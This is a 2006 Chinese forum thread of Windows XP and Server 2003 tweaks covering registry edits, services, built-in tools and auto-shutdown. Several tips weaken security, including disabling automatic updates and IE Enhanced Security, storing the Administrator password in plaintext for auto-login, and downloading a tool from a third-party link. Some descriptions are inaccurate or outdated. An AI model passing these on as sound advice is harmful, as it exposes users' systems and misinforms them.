Drwtsn32是一个程序错误调试器。运行后会获得并记录系统中程序错误的信息,并创建一个文本文件?drwtsn32.log?,提供错误原因的详细说明,并给出解决问题的建议性操作。

5.DVD播放器——Dvdplay

Windows XP提供的一个“免费”的DVD播放器,也就是Windows Media Player。

6.自解压文件制作工具——Iexpress

利用Iexpress可制作两种自解压文件,一种是标准自解压文件,另一种是安装程序式自解压文件。

7.备份工具——Ntbackup

Windows XP中内置的备份工具。

8.IP地址侦测器——Nslookup

通过这个IP侦测工具ping就可以轻而易举地得到它们的真正IP地址。



9.注册表编辑器增强版——Regedt32

用来修改注册表设置的高级工具。

10.Windows升级程序——Wupdmgr

联上网后,可以通过此程序进行Windows的自动升级。

11.共享文件夹设置工具——Shrpubw

它的作用与右击一文件夹,选择“共享”基本上等价。

12.Microsoft签字验证工具——Sigverif

所谓“签署的文件”,就是被授予Microsoft数字签署的文件。该签署表明,该文件是原始文件的一模一样的副本。通过microsoft签字验证工具,我们可在计算机上查找已签署和未签署的文件,也可查看签署文件的身份验证,以确认该文件还没有被篡改。

13.音量控制程序——Sndvol32

平时双击任务栏上的小喇叭就会出现的音量控制程序。

14.任务管理器——Taskmgr

使用任务管理器可快速查看正在运行的程序的状态,或终止已停止响应的程序,也可以查看CPU和内存使用的情况。

15.远程连接程序——Telnet

Windows自带的纯中文界面的远程连接程序。

16.系统文件检查器——Sfc

使用Windows难免会出现系统文件损坏或丢失的毛病,而如果为了几个小小的文件就去重装系统,又显得稍微麻烦了一些。通过系统文件检查器Sfc.exe,一切都会变得非常简单。

以上16个程序都在系统盘的WINDOWS\SYSTEM32文件夹下。

17.文件转移向导——Migwiz?WINDOWS\SYSTEM32\usmt文件夹下?

通过它,我们就可以实现系统状态的备份与恢复。

18.系统配置程序——Msconfig?windows\pchealth\helpctr\binaries文件夹下?

和Windows中的系统配置程序一样,通过这个程序,我们可对系统的一般、system.ini、win.ini、boot.ini、服务和启动项目进行修改。
作者: 语苛经历    时间: 2006-10-23 21:27
WIN XP请不要自作多情


Windows XP已经推出较长一段时间了,相对于以前的操作系统来说它提供了一系列的新功能,但并不是每种新功能都能切实方便广大用户的日常使用,有时候微软的一番好意反而变成了自作多情,比如“错误报告”就是如此,它的本意是要帮助用户解决问题,没想到却给我们带来了不必要的麻烦。还有其他诸如此类的一些功能,如果你不喜欢,就让它们走开吧!

关闭自动更新

用鼠标右键单击“我的电脑”,选择“属性”,进入“自动更新”选项卡,选择“关闭自动更新,我将手动更新计算机。”选项,再单击“确定”按钮即可关闭自动更新功能。

禁止Windows Messenger开机时启动

依次单击“开始→所有程序→Windows Messenger”,在Windows Messenger主界面中选择“工具→选项”,在“首选参数”选项卡中清空“在Windows 启动时运行此程序”前的复选框即可。

禁止Windows Messenger随OE启动

单击“开始→运行”,输入“Regedit”后回车,打开“注册表编辑器”,依次展开 HKEY_CLASSES_ROOT/CLSID/{FB7199AB-79BF-11d2-8D94-0000F875C541}/LocalServer32分支,删除默认键值即可。同样在注册表中,依次展开HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Outlook Express”分支,在窗口右侧新建一个名为“HideMessenger”的DWORD值,然后将其键值设为“2”即可。

当然,最彻底的方法莫过于将Windows Messenger卸载:单击“开始→运行”,输入“Rundll32 advpack.dll,LaunchINFSection windir/INF/msmsgs.inf,BLC.Remove”后回车即可,其中“windir”为Windows XP 的安装目录,如“C:Windows”。

关闭错误报告

打开“系统属性”对话框,切换到“高级”选项卡,然后单击“错误报告”按钮,在弹出的对话框中选中“禁用错误汇报”项(建议同时选中“但在发生严重错误时通知我”复选框)即可关闭错误报告功能。



关闭光驱的自动播放功能

打开“我的电脑”,用鼠标右键单击要禁止自动播放的驱动器盘符,选择“属性→自动播放”,然后在下拉框中先选择光盘的类型,如“音乐文件”,再选择Windows要执行的操作,如“不执行操作”(如图所示),然后单击“应用”按钮。用同样的方法, 我们可以设置向光驱中放入数据光盘、视频光盘、混合光盘等不同类型光盘时光驱自动执行的方法。



删除注册表的自动记忆功能

Windows XP的注册表编辑器具有记忆功能,运行时会自动定位于上次使用注册表时最后打开的键值。虽然该功能在一定程度上方便了我们的使用,但也存在泄露我们秘密的可能性。因此,我们有必要将该功能禁止:

先在任意文件夹中建立一个注册表文件,如ClearLastKey.reg,内容如下:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER/Software/Microsoft/Windows/
CurrentVersion/Applets/Regedit ]

"LastKey"=""

接下来在该文件夹中再新建一个文本文件,输入“regedit /s ClearLastKey.reg”,将该文本文件命名为“ClearLastKey.bat”。运行该文件即可删除注册表的位置记录。

上面的办法虽然能够解决问题,但步骤稍多有点麻烦,其实要彻底解决这个问题也很容易,只要我们养成一个好习惯就行了:由于“LastKey”键所记录的是退出注册表时最后一个具有焦点的分支,因此只要我们在退出注册表编辑器前用鼠标点一下最顶层的“我的电脑”即可。这样不管是谁,再打开注册表时都只能看到“我的电脑”了,真干净,呵呵!
作者: 语苛经历    时间: 2006-10-23 21:28
WIN XP小技巧两则

快速锁定计算机

  如果你因为有急事而需要离开,但又不希望电脑进行系统注销,那该怎么办呢?哈,我们完全可以通 过双击桌面快捷方式来迅速锁定键盘和显示器,而无需使用CTRL+ALT+DEL组合键或屏幕保护程序。首先在桌面上单击鼠标右键,在随后出现的快捷菜单上选择"新建"→"快捷方式",接着系统便会启动创建快捷方式向导,在文本框中输入“rundll32.exe user32.dll,LockWorkStation”,单击“下一步”,在弹出的窗口中输入快捷方式的名称。比如我们可将它命名为"锁定计算机"或选用你所喜欢的任何名称,单击"完成"。此时屏幕上会有一个空白的图标,如果你对图标的样式不满意,我们还可以对快捷方式图标进行修改,右键单击快捷方式,选择"属性",单击"快捷方式"选项卡,点击“更改图标”按钮,在“在这个文件中查找图标”文本框中输入Shell32.dll,单击“确定”,再从列表中选择所需图标,并单击“确定”。怎么样?是不是变得好看多了。

  远程桌面快捷方式

  Windows XP提供了功能强大的“远程桌面连接”,通过它我们就可以把在公司未做好的事带回家去完成了。我们可以在家中计算机的桌面上添加一个快捷方式,以便快速启动“远程桌面连接”并与你公司中的计算机建立连接。

  单击“开始”→“程序”→“附件”→“通讯”→“远程桌面连接”,在弹出的窗口中单击“选项”,再配置针对你公司中计算机的连接设置。点击“另存为”,输入名称(如“连接公司”),单击“保存”。再打开刚才保存连接设置的文件夹,在名为“连接公司”的文件上单击鼠标右键。从随后出现的快捷菜单中点击“创建快捷方式”,再把快捷方式拖放到家中计算机的桌面上,如需启动“远程桌面连接”并与你公司中的计算机建立连接,只要双击此快捷方式,一切就OVER了。
作者: 语苛经历    时间: 2006-10-23 21:28
WINDOWNS 2003中文版全面优化

1、 缩短等待时间
打开注册表编辑器,找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control,将 WaitToKillServiceTimeout 设为:4000(原设
定值:20000)。找到 HKEY_CURRENT_USER\Control Panel\Desktop 键,将右边窗口的 WaitToKillAppTimeout 改为 4000(原设定值:
20000),即关闭程序时仅等待1秒。将 HungAppTimeout 值改为:2000(原设定值:5000),表示程序出错时等待0.5秒。

2、 让系统自动关闭停止响应的程序
打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键,将 AutoEndTasks 值设为 1(原设定值:0)。

3、 加速共享查看
打开注册表编辑器,把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace
下的 {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 删掉

4、 加快Windows 2003的启动:

(1)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement\PrefetchParameters,其中有一个键值
名为EnablePrefetcher,多数情况下它的值是3,推荐设置值是1.

(2)"我的电脑"->"属性"->"高级"->"启动和故障修复"中,点"错误报告",选择"禁用错误汇报"、"但在发生严重错误时通知我"。

(3)点击"编辑",在弹出记事本文件中:
  [Operating Systems]
  timeout=30 //把缺省时间 30 秒改为 0 秒

5、优化“启动和故障恢复”设置:
右键单击“我的电脑”,点击属性,点击“高级”,在“启动和故障恢复”
一栏中,点击“设置”,其中的“系统失败”一栏中,只选择“自动重新启动”,写入调试信息选择“无”。

6、关闭“Internet时间同步”功能:
请依次单击“开始”→“控制面板”→“日期、时间、语言和区域选项”,然后单击“日期和时间”→“Internet时间”。

7、关闭华医生Dr.Watson:
在"开始"->"运行"中输入"drwtsn32"命令,或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具"->"Dr Watson",调出系统里的华
医生Dr.Watson ,只保留"转储全部线程上下文"选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,
删除后可节省几十MB空间。

8、取消对zip文件的支持:
运行,敲入:regsvr32 /u zipfldr.dll 然后回车即可。

9.windows2003的内存优化!!!!!!!!!!!!(警告!!!!!以下设置需要有256M以上的内存才能有好的效果!!!)
注册表:
HKEK_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management
中的:禁用内存页面调度: DisablePagingExecutive 值改为“1”
提升系统缓存: LargeSystemCache 值改为“1”

10.修改cpu的二级缓存
在正常情况下,2003会自动识别cpu的二级缓存。但有时2003不会这样做,这样就需要手动优化以改善cpu的
性能。
a.)运行"regedit";
b.)去"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\
Memory Management\SecondLevelDataCache]";
c.)修改他的十进制:
AMD Duron: 64(kb);
  CeleronA/celeron2/3:128;
  PII mobile/PIII E(EB)/P4A/AMD K6-3/AMD THUNDERBird/Cyrix III:256;
  AMD K6-2/PII/PIII katmai/P4B/AMD Athlon:512;
  PII Xeon/PIII Xeon:1024;
e.)重启。

11.修改磁盘缓存以加速xp
a.)运行 "regedit";
b.)去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\
Memory Management\IoPageLockLimit];
c.)根据你的内存修改其十六进制值:
64M: 1000;
128M: 4000;
256M: 10000;
512M或更大: 40000.
d.)重启

12.减少磁盘扫描等待时间
在dos下,键入“chkntfs/t:0”

13.解除带宽限制
运行----gpedit.msc-----管理模版-----网络----QoS数据包调度程序---限制可保留带宽---启

动-----下面输入 0 ----确定---------在你的拨号图标右健属性找到网络-----看看有没有QoS

数据包调度程序-------如果没有点安装-----服务------添加----选QoS数据包调度程序----看

看有没有打勾----有就代表成功了--------重启---ok!


14使用xp主题
打开控制面板->管理工具->服务,在里面把theme这个服务启动,重启
然后进桌面属性,在桌面主题里面选xp样式,就可以换回熟悉的XP主题!

15.禁用配置服务器向导
由于不需要服务器设置功能,首先我们先禁止“配置你的服务器”向导的出现,你可以在控制面板
-> 管理员工具-> 管理你的服务器 运行它,然后在窗口的左下角复选“登录时不要显示该页”

16.建立一个新的用户账号
打开“开始” -> “运行” -> 键入“lusrmgr.msc ”,你将看到本地用户和组,右键点击左边窗口的“用户”,选择“新用户”.在弹出的对话框中输入账号信息,然后点击“建立”这样你的账号就可用了,当然,你可以选择把你的账号添加到管理员组,右键点击你新建的用户。然后选择“属性” ->
点击“隶属于” -> “添加” -> “高级” -> “现在查找”在查找结果对话框中双击“管理员”,再点击两次“确定”后关闭“本地用户和组”,现在你将可以注销Administrator用户用你自己的账号登录系统。

17.禁用Internet Explorer Enhanced Security
作为新windows组件出现的IE安全插件--Internet Explorer Enhanced Security默认把你IE安全设置为最高。这样你将在访问站点弹出询问框并对你浏览网页及文件下载做出阻止的行为。我们其实不一定需要这个组件。我们首先禁止询问框的出现,在弹出的对话框中复选”以后不要显示这个信息
然后,我们可以在IE工具选项中自定义设置IE的安全级别。在安全选项卡上拉动滚动条把Internet区域安全设置为中,这个级别将适合大多数人,要是你有特别要求,这个步骤将不适合你。通过对IE安全的设置,你现在安装可以上Sun's Java VM!
当然,你也可以在控制面板--添加程序--添加或删除Windows组件中卸载Internet Explorer Enhanced Security 。

18.安装Java VM
Windows server 2003没有集成MS Java VM或Sun Java VM,你可以自行下载并安装它。

19.禁止关机事件跟踪
关机事件跟踪也是Windows server 2003区别于其他工作站系统的一个设置,对于服务器来说这是一个必要的选择,但是对个人用户却没什么用,我们同样可以禁止它。打开开始->“运行” ->输入“gpedit.msc ”,在出现的窗口的左边部分,选择 “计算机配置”-> “管理模板”-> “系统”在右边窗口双击“显示关闭事件跟踪程序”在出现的对话框中选择“禁止”,点击然后“确定”保存后退出。这样,你将看到类似于windows 2000的关机窗口

20.启用硬件和DirectX加速
★硬件加速:桌面点击右键--属性 -> 设置--高级--疑难解答。把该页面的硬件加速滚动条拉到“完全”,点击“确定”保存退出。这期间可能出现一瞬的黑屏是完全正常。

★DirectX加速:打开“开始” -> “运行”,键入“dxdiag”并回车打开“DirectX 诊断工具”,在
“显示”页面,点击DirectDraw, Direct3D and AGP Texture 加速三个按钮启用加速。

21.允许声音加速
如果你使用的是Windows server 2003标准版请从第二步操作,因为标准版已允许声音服务。
★打开“开始” -> “运行”,键入“Services.msc ”,在出现的窗口中找到“Windows Audio”并双击它,然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始” -> “确定”
★打开“开始” -> “运行”,键入“dxdiag”并回车打开“DirectX 诊断工具”,在“Sound”页面,把“声音的硬件加速级别”滚动条拉到“完全加速”。

22.启用桌面主题
也许你对WINDOWS经典的桌面已经感到厌烦的话,你就要考虑启用桌面主题了,Windows server 2003默认是关闭此服务的。打开“开始” -> “运行”,键入“Services.msc ”,在出现的窗口寻找Services.msc并双击它, 然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始” -> “确定”。
这样的操作也是只能让你使用Windows自带的Luna主题的三个模式,假如你希望使用更多的第三方主题文件的话,你需要使用修改的Uxtheme.dll文件来支持它,关于修改的Uxtheme.dll文件,你可以在 http://vortex.winbeta.org/ 找到更多。

23.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务
★假如你希望启用Windows内置的IMAPI CD-Burning服务。做如下操作:
打开“开始” -> “运行”,键入“Services.msc ”,在出现的窗口中找到“IMAPI CD-Burning COM Service ”并双击它,然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始” -“确定”
★假如你有如数码相机和扫描仪之类的影像设备,你应该打开Windows Image Acquisition 服务。
打开“开始”-> “运行”,键入“Services.msc ”,在出现的窗口中找到“Windows Image Acquisition (WIA) ”并双击它,然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始”-> “确定”

24.高级设置
★右键点击“我的电脑”--属性--高级--性能--设置--高级,把“处理器计划”和内存使用分配给“程序”使用,然后点击“确定”。

25.自动登陆
Windows Server 2003默认是使用"CTRL-ATL-DEL to login" 对话框来登陆Windows的,不过我们我们可以使用Windows XP的Tweak UI来使Server 2003自动登陆。
下载:Tweak UI http://www.ssite.org/uppic/sun_pic/microsoft/server2003/tweakui.exe
下载后直接执行tweakui.exe
在左边的面板中选择Logon -> Autologon -> 在右边勾选Log on automatically at system startup输入你的用户名和域名(如果没有就不写)
点击下面的Set Password,输入用户名的密码,然后点击OK。
虽然同样的功能通过修改注册表也能完成,但是修改注册表的方法密码在注册表中表现的是明文,而Tweak UI在注册表中不会留下明文的密码,所以推荐使用Tweak UI来完成这项工作。

26.安装DirectX 9a
在Windows Server 2003上安装DirectX 9a和在其他版本的Windows上安装DirectX 9a的方法是一样的。安装之前先启用DirectX and Graphics Acceleration。 安装完成后重启。

27.设置虚拟内存
我的电脑---高级----设置----性能选项-----高级-----虚拟内存-----更改-----选择驱动器(最好选在不怎么使用的分区)-------自定义大小(物理内存不大于256M时,设为物理内存的2倍,最大和最小都一样;物理内存不小于512M时,设为物理内存的1.5倍,最大和最小都一样)确定,重启。


28.把Internet Explorer的临时文件设到不常使用的分区-----工具---Internet选项----Internet临时文件-----设置------移动文件夹----选择路径----确定

29.装2003的分区最好别再装其他应用软件,这样系统盘不易产生碎片;每周整理一次文件碎片

30.对windows优化大师有信心的,可以使用最新版5.4进行一些优化;最好每隔几天就用优化大师清理一下注册表

31.杀毒软件可用诺顿8.0或8.1企业版;KV2003,我已测试均能正常运行
作者: 语苛经历    时间: 2006-10-23 21:29
WINDOWS2003优化小贴士

1.禁用配置服务器向导
禁止“配置你的服务器”(Manage Your Server)向导的出现:在控制面板(Control Panel) -> 管理员工具(Administrative Tools )-> 管理你的服务器(Manage Your Server)运行它,然后在窗口的左下角复选“

登录时不要显示该页”(Don't display this page at logon)。

2.禁用Internet Explorer Enhanced Security 和禁止安全询问框的出现
在IE工具选项中自定义设置IE的安全级别。在”安全“(Security)选项卡上拉动滚动条把Internet区域安全设置为”中“(Medium)或“中低”。自定义设置中将有关的选择“提示”修改为选择“禁止”或“启用”。

3.禁用关机事件跟踪
开始 -> 运行 -> gpedit.msc -> Computer configuration -> Administrative Templates -> System -> Display shutdown event tracker -> 设置为 Disable。
如果是中文版,则:开始 -> 运行 -> gpedit.msc->计算机配置 -> 管理模板 -> 系统 -> 显示关机事件跟踪 -> 禁用。

4. 禁用开机 CTRL+ALT+DEL和实现自动登陆
方法1:打开注册表(运行->“Regedit”),再打开:
HKEY_LOCAL_MACHIN|SOFTWARE|MicroSoft|Windows NT|CurrentVersion |Winlogon段,在此段中按右键,新建二个字符串段,AutoAdminLogon=“1”,DefaultPassword=“为超级用户Administrator所设置的Password”。
注意,一定要为Administrator设置一个密码,否则不能实现自启动。 然后,重新启动Windows即可实现自动登录。
方法2:管理工具 -> Local Security Settings(本地安全策略) -> 本地策略 -> 安全选项 -> interactive logon: Do not require CTRL+ALT+DEL,启用之。
方法3(自动登陆):使用Windows XP的Tweak UI来实现Server 2003自动登陆。
下载:Tweak UI http://www.ssite.org/uppic/sun_pic/...003/tweakui.exe
下载后直接执行tweakui.exe 在左边的面板中选择Logon -> Autologon -> 在右边勾选Log on automatically at system startup输入你的用户名和域名(如果没有就不写),点击下面的Set Password,输入用户名的密码,然后点击OK。

5.启用硬件和DirectX加速
★硬件加速:桌面点击右键--属性(Properties) -> 设置(Settings )--高级( Advanced )--疑难解答(Troubleshoot)。把该页面的硬件加速滚动条拉到“完全”( Full),最好点击“确定”(OK)保存退出。这期间可能出现一瞬的黑屏是完全正常。

★DirectX加速:打开“开始”(Start) -> “运行”(Run),键入“dxdiag”并回车打开“DirectX 诊断工具”(DirectX Tools),在“显示”(Display)页面,点击DirectDraw, Direct3D and AGP Texture 加速三个按钮启用加速。把“声音的硬件加速级别”(Hardware Sound Acceleration Level)滚动条拉到“完全加速”( Full Acceleration)。

6.启用桌面主题和隐藏文件 
打开“开始”(Start) -> “运行”(Run),键入“Services.msc ”,选themes“主题”(默认是禁止的),然后改为“自动”,按“应用”,选“开启”。接着点“桌面”的属性,在“主题”里选“windows xp”Windows Server 2003默认显示所有的文件夹,如果可以通过以下方法来隐藏:打开任意一个文件夹,选择“工具” -> “文件夹选项” -> “查看”,选择“不显示隐藏的文件和文件夹”,点击“确定”。

7.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务
★启用Windows内置的IMAPI CD-Burning服务:打开“开始”(Start) -> “运行”(Run),键入“Services.msc ”,在出现的窗口中找到“IMAPI CD-Burning COM Service ”并双击它,然后在启动模式(startup type )的下拉菜单选择“自动”(Automatic),并点击“应用”(Apply) ->“开始”(Start) -> “确定”(OK)

★假如你有如数码相机和扫描仪之类的影像设备,应该打开Windows Image Acquisition 服务。
打开“开始”(Start) -> “运行”(Run),键入“Services.msc ”,在出现的窗口中找到“Windows Image Acquisition (WIA) ”并双击它,然后在启动模式(startup type )的下拉菜单选择“自动”(Automatic),并点击“应用”(Apply) ->“开始”(Start) -> “确定”(OK)

8.高级设置
★禁用错误报告
右键点击“我的电脑”(My Computer)--属性(Properties)--高级(Advanced)--点击“错误报告”(Error Reporting )按钮,在出现的窗口中把“禁用错误报告”(Disable Error Reporting)选上并复选“但在发生严重错误时通知我”(But, notify me when critical errors occur.)

★调整虚拟内存
一些朋友经常会对关机和注销缓慢感到束手无策,解决办法就是禁用虚拟内存,这样你的注销和关机时间可能会加快很多。右键点击“我的电脑”(My Computer)--属性(Properties)--高级(Advanced)--性能(Performance)--设置(Setting)--高级(Advanced),点击“虚拟内存”(Virtual memory)部分的“更改”(Change),然后在出现的窗口选择“无分页文件”。重启系统即可。

9.加快启动和运行速度

**修改注册表,减少预读取,减少进度条等待时间:开始→运行→regedit启动注册表编辑器,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management\PrefetchParameters, 有一个键值名为EnablePrefetcher,它的值是3,把它改为“1”或“5”。
找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control,
将 WaitToKillServiceTimeout 设为:1000或更小。 ( 原设定值:20000 )
找到 HKEY_CURRENT_USER\Control Panel\Desktop 键,将右边视窗的WaitToKillAppTimeout 改为 1000, ( 原设定值:20000 )即关闭程序时仅等待1秒。
将 HungAppTimeout 值改为:200( 原设定值:5000 ), 表示程序出错时等待0.5秒。

**让系统自动关闭停止回应的程式。
打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键,
将 AutoEndTasks 值设为 1。 ( 原设定值:0 )

**禁用系统服务Qos
开始菜单→运行→键入 gpedit.msc ,出现“组策略”窗口, 展开 "管理模板”→“网络” , 展开 "QoS 数据包调度程序", 在右边窗右键单击“限制可保留带宽" ,在属性中的“设置”中有“限制可保留带宽" ,选择“已禁用”,确定即可。当上述修改完成并应用后,用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler(QoS 数据包调度程序)"。说明修改成功,否则说明修改失败。

**改变窗口弹出的速度:
找到HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics子键分支,在右边的窗口中找到MinAniMate键值,其类型为REG_SZ,默认情况下此健值的值为1,表示打开窗口显示的动画,把它改为0,则禁止动画显示,接下来从开始菜单中选择“注销”命令,激活刚才所作的修改。

  **禁止Windows XP的压缩功能:
点击“开始”下的“运行”,在“运行”输入框中输入“regsvr32/u zipfldr.dll”,然后按回车键即可。

  **设置个性的启动信息或警告信息:
个性化的Windows XP启动:打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon子键分支,双击LegalNoticeCaption健值,打开“编辑字符串”对话框,在“数值数据”下的文本框中输入自己想要的信息标题,如“哥们儿,你好!”,然后点击“确定”,重新启动。
如果想要改变警告信息的话可以双击LegalNoticeText健值名称,在出现的“编辑字符串”窗口中输入想要显示的警告信息,单击“确定”,重新启动。

10.可用的杀毒软件和防火墙:
Symantec Norton Antivirus Corporate 8.01
Zone Alarm 3.7.159
Norton Personal Firewall 2003
作者: 语苛经历    时间: 2006-10-23 21:30
Windows XP操作系统自动关机的实现




  如果你想出门,但电脑又正在进行工作,这时就要用到自动关机。大多数实现自动关机的方法都是使用一些第三方软件,这样不仅麻烦,而且为实现这个小功能而专门动用一个软件,显的小题大做了!其实Windows XP(Windows 2000也可以)自身就具备定时关机的功能,下面我们就来看看如何实现Windows XP的自动关机。

  Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中
。如果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。

  比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60分钟后自动关机,“3600”代表60分钟。

   设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。

  Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如“-s”就表示关闭本地计算机,“-a”表示取消关机操作,下面列出了更多参数,大家可以在Shutdown.exe中按需使用。

  -f:强行关闭应用程序

  -m \\计算机名:控制远程计算机

  -i:显示图形用户界面,但必须是Shutdown的第一个选项

  -l:注销当前用户

  -r:关机并重启

  -t时间:设置关机倒计时

  -c "消息内容":输入关机对话框中的消息内容(不能超127个字符)
作者: 语苛经历    时间: 2006-10-23 21:31
Windows XP操作系统自动关机的实现




  如果你想出门,但电脑又正在进行工作,这时就要用到自动关机。大多数实现自动关机的方法都是使用一些第三方软件,这样不仅麻烦,而且为实现这个小功能而专门动用一个软件,显的小题大做了!其实Windows XP(Windows 2000也可以)自身就具备定时关机的功能,下面我们就来看看如何实现Windows XP的自动关机。

  Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中
。如果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。

  比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60分钟后自动关机,“3600”代表60分钟。

   设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。

  Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如“-s”就表示关闭本地计算机,“-a”表示取消关机操作,下面列出了更多参数,大家可以在Shutdown.exe中按需使用。

  -f:强行关闭应用程序

  -m \\计算机名:控制远程计算机

  -i:显示图形用户界面,但必须是Shutdown的第一个选项

  -l:注销当前用户

  -r:关机并重启

  -t时间:设置关机倒计时

  -c "消息内容":输入关机对话框中的消息内容(不能超127个字符)
作者: 语苛经历    时间: 2006-10-23 21:32
WINDOWS XP的几个小技巧

笔者提示:在做本文的操作前,必须以管理员或 Administrators组成员身份登录才能完成该过程,登陆进入Windows XP操作系统。

  一、自动关闭停止响应的程序

??在Windows XP操作系统中,这个设置可以使Windows XP当诊测到某个应用程序已经停止相应时可以自动关闭它,而不需要进行麻烦的手工干预。想要实现这个功能,就请点击“开始”→“运行”输入“RegEdit”打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop分支,将AutoEndTasks的键值设置为1即可。

  二、加快启动和减少故障恢复时间

??也许你的计算机中是Windows9X与WindowsXP共存,用户完全可以减少Windows XP操作系统启动的时候显示操作系统列表的时间。请点击“开始”→“运行”输入“msconfig”打开“系统配置实用程序”→“BOOT.INI”,将超时设置改为你想要的时间,如果你是一个忠实的Windows XP操作系统的使用者,笔者建议你完全可以把启动等待时间设置为5秒。或者右键单击“我的电脑”→“属性”→“高级”,在“启动和故障恢复”中点击“设置”,可以设置显示操作系统列表的时间,单击“编辑”也可以手动编辑启动选项,将timeout=30改为timeout=5即可。

  

  三、如何减少磁盘空间的浪费

??在Windows XP操作系统运行过程中,常常会产生后缀名诸如tmp、bak、log、old、txt 等的文件,这些文件其实都是可以进行安全删除的,甚至包括Windows目录下面的bmp文件,如果你不喜欢Windows XP中自带的那些墙纸的话。完全可以删除掉这些文件。

??在Windows XP操作系统Windows\temp目录下面的文件,笔者也建议你删除掉,那些都是在安装应用软件的过程中遗留下的多余文件。还有一点,就是在硬盘中的小文件,请尽可能地把它们集中起来,然后用WinZip这样的压缩软件合并成一个大文件,从而达到减少磁盘空间浪费的目的。

  四、优化页面文件

  现在主流计算机的内存配置已经提升到128MB,不过对于庞大的WindowsXP操作系统以及功能越来越强大、占用系统内存资源也越来越多的各种软件来说,128MB还是远远不能满足要求的,这时候WindowsXP使用的页面文件(功能相当于我们常说的虚拟内存)就可以发挥其作用了。它将一部分硬盘空间设置为虚拟内存,从而扩大了计算机的可用“内存”空间来满足程序的运行要求。

  由于Windows XP是动态分配页面文件,Windows XP会不停地在硬盘中扩大空间来满足程序运行的要求。这样会导致系统工作效率的降低和系统反应的延迟。所以,就将虚拟内存设置为静态的。微软的建议是页面文件的最小值,应该是当前系统内存容量再加上12MB(RAM+12MB),对于一台拥有128MB内存的机器和一台512MB内存的机器,优化性能的规则肯定不同。对于一台装有128MB的机器,页面文件的设置可根据这样一个公式计算:内存空间大小×1.75。对于一台装有256MB或更多内存的机器,页面文件的设置可根据这样一个公式计算:内存空间大小×1.5。这样才能让操作系统在崩溃或死机前将内存中全部的内容复制到硬盘上。

  具体做法是:右键单击“我的电脑”→“属性”→“高级”,在“性能”选项中点击“设置”→“高级”,在“虚拟内存”选项中点击“更改”,选择“自定义大小”,更改页面文件大小,将初始大小与最大值改为一致,完成后,点击“设置”即可。

  

  五、视觉效果

??大家知道,在Windows XP在菜单效果方面比起win9x等兄弟可以说是非常漂亮了,不过对于小内存用户来说,太华丽了,太占内存了,(笔者的256MB内存也只能是基本满足需要)那么该怎么样修改呢?请跟我来:

??1.请点击“开始”→“控制面板”,在“控制面板”的分类视图中选择“性能和维护”→“调整视觉效果”,此时将弹出“性能选项”窗口,在这里选择“调整为最佳性能”可以将菜单的所有动画效果去掉。应该感到速度有明显提高,如果还觉得不够快,请往下看。

  

??2.接下来请点击“开始”→“运行”输入“RegEdit”打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop分支,在右边窗口双击键值名MenuShowDelay的项,这一项的取值范围是0~100000(单位为毫秒),接下来将默认的值改为0即可。

  六、设置硬盘工作模式

??现在电脑爱好者们所用的硬盘要比过去大得多(因为便宜嘛),动辄30G、400G的。大硬盘一般都支持DMA工作模式,如果确定你的硬盘支持DMA方式,那么你就可以用DMA方式代替传统的PIO方式,这样可以提高硬盘的传输速度并减少你的CPU占用率,以提高你的系统性能。具体做法是:用点击“开始”→“控制面板”→“性能与维护”→“查看电脑基本信息”→“设备管理器”→“IDE ATA/ATAPI控制器”→“IDE通道”→“属性”→“高级设置”,在传送模式中选择“DMA”即可。

  

  七、邮件收发程序Outlook Express

  下面这个小技巧可以减少OE出错的机率。 在Outlook Express界面,在菜单上打开“工具”→“帐号”,选择你的帐号,再选择“属性”→“高级”,把服务器超时一项把时间拉到最长(五分钟)。

  

